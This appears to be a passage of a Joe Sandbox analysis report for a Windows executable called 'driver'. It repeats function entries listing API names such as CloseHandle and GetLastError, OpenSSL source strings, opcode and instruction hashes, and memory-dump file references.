                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4170891091-0
                                                                                                                                                                                                                                                • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                                • Instruction ID: 0ade7742cb1139ad6edad806c389d333ff31c7ee319d8aa32b82e6c29b3de311
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A51E672F4A2118BFB18CF65D9516BC27A1AB00F9CF50413AEE1DD2AE6DF78B4019700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2780335769-0
                                                                                                                                                                                                                                                • Opcode ID: 76e5ec389a761054d6dca2d633b3b1debb0125942bc8cb6b4d903665fcb6299d
                                                                                                                                                                                                                                                • Instruction ID: 34345da926f105f09844a299d8685bc2fc463766ad38cf1b0ea008df153402ce
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76e5ec389a761054d6dca2d633b3b1debb0125942bc8cb6b4d903665fcb6299d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B517C22E4A6418AFB14DFB2D4503BD23B1BB48F9DF548435DE4DA768ADFB8E441A700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1279662727-0
                                                                                                                                                                                                                                                • Opcode ID: 24238bc47b860f74abc13910c6a37bc7991964e3dbe0c30fb6d15975fbdc4001
                                                                                                                                                                                                                                                • Instruction ID: af24e6ae04aa384eaf642277f0b4bd08a85d39d302fba75e2ac716e15e3b23bc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24238bc47b860f74abc13910c6a37bc7991964e3dbe0c30fb6d15975fbdc4001
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0641B522E597828BF3149B22951037963A0FB94F98F109335EA5C53AD3DFBCB4E09700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                                • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_read_n
                                                                                                                                                                                                                                                • API String ID: 1452528299-4226281315
                                                                                                                                                                                                                                                • Opcode ID: 72c0e7aa6cb440006a06cd762c0773f9cb24828254b5c2bc54d82e6e819b576e
                                                                                                                                                                                                                                                • Instruction ID: 6b6d3d1733aacba4b384f30928ed86b13e3af49b0ef67f767abe668219ae2257
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72c0e7aa6cb440006a06cd762c0773f9cb24828254b5c2bc54d82e6e819b576e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAA19A21B0AA82A2FF50AF25D8157B93A90EF44BC4F544135DE4D0BBD9DF3CD8A58728
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                                • String ID: ..\s\ssl\statem\statem.c$state_machine
                                                                                                                                                                                                                                                • API String ID: 1452528299-1722249466
                                                                                                                                                                                                                                                • Opcode ID: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
                                                                                                                                                                                                                                                • Instruction ID: 216ccac2aeea0e1d787c5935be936963c6965305b8a21ddc50c918183cf33211
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1A16522A0EA43A5FF649A35E8423BD3694EF41BC4F244035DD4D466DACF3CE8618779
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                                • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_write_pending
                                                                                                                                                                                                                                                • API String ID: 1452528299-1219543453
                                                                                                                                                                                                                                                • Opcode ID: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
                                                                                                                                                                                                                                                • Instruction ID: 4e05ea7befb2d79b70eb1c4458b4d2ab7281515fa33257f6f4f0bba41ad722ee
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23419862B0AA86A6FF509B15D4447AA73A0FF80BD4F148135DA4C07BD6DF3DE4B18718
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3251591375-0
                                                                                                                                                                                                                                                • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                                • Instruction ID: c148c9aa73422208d980bb07c7718939a48255daa0e182e7742f38094fa45c89
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C314B24E8B1435AFA54AB2794253B916919F85F8CF440438E54DCB2D3DEECF805A250
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                                • Instruction ID: 11bafb8702b7b25db2b9093d4a80d2cc83c0ff6dfd8ab14d6a58533e492f9852
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA51C661B8F2514EEA289E67940067E6691AF44FACF144734DD6D87BCBCFBCF401A600
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                                                • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                                • Instruction ID: adb64a7c1b0ee9e0a91fff866cf25c4ab2f9d1114ce483fa9e1f659952c6bfb3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35112361B09B8185EA108B27E814169A761FB45FF8F644331EE7D8B7EACFBCE0119700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A29C58A9), ref: 00007FF6A29C59C7
                                                                                                                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A29C58A9), ref: 00007FF6A29C59DD
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1707611234-0
                                                                                                                                                                                                                                                • Opcode ID: 3eb82881f56b5e10c0b4ae1229c4961d4f4fc58e8f6ff53d00dfea58f30bf4d5
                                                                                                                                                                                                                                                • Instruction ID: a5ad6016d22d8c926d8a180f1310a3abaaacf81444693b0821953df7218e71d6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3eb82881f56b5e10c0b4ae1229c4961d4f4fc58e8f6ff53d00dfea58f30bf4d5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C11823265D60286FA544B12A45113EB7A0FB84F7AF500235EA9DC19D9EFACE014EB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00007FF6A29CAA45,?,?,00000000,00007FF6A29CAAFA), ref: 00007FF6A29CAC36
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF6A29CAA45,?,?,00000000,00007FF6A29CAAFA), ref: 00007FF6A29CAC40
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                                                                                                • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                                • Instruction ID: 6cbaf254e8af50c7a1a333f7f4cc45dd2f85b16513f45232177e9ebc722cf1ae
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9321C921F9E64246FAD45B63D4943B912926F84FA8F084239D91EC73C3DEECF4456301
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                                • Instruction ID: 8d5985ee5f3c6c11994a77b79460bb9d5ea420ea99a8f76aaea311e4cf2306d2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D41C232A4A2018BEA34DB17A55027D77A5EB55F98F140131EA8EC3792CFADF402EB51
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _fread_nolock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 840049012-0
                                                                                                                                                                                                                                                • Opcode ID: 33730839a158f4d8ce7f6d64c79b0ad0b4ea6e31d0dc51adf97bd487b526a0a8
                                                                                                                                                                                                                                                • Instruction ID: d8e74b0e728e09b6aa21c61caea39c79d4c6d026dae64044f200c5f44ffd8338
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33730839a158f4d8ce7f6d64c79b0ad0b4ea6e31d0dc51adf97bd487b526a0a8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3221A321B8A65289FA149A1369043FA9651BF49FCCF8C5430EE4D87787CEBDE042A601
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                                • Instruction ID: 0ca300ebdfacd212c790755f9d8e081d95734f5266d70d90ba69dbed48f93e67
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8531AE22A5A64289F7515B57885137C36A1AF40F9CF520135E96D833D3CFFCF851A721
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                • Instruction ID: b19c2d8bec1afd658c8699d7ed7b117ee2b773e9c62324a95e810f2c97f1e2d9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD119322A5E6418AFA649F13D4102BEA260EF45F88F444031EB4CE7A97DFBCF400A700
                                                                                                                                                                                                                                                APIs
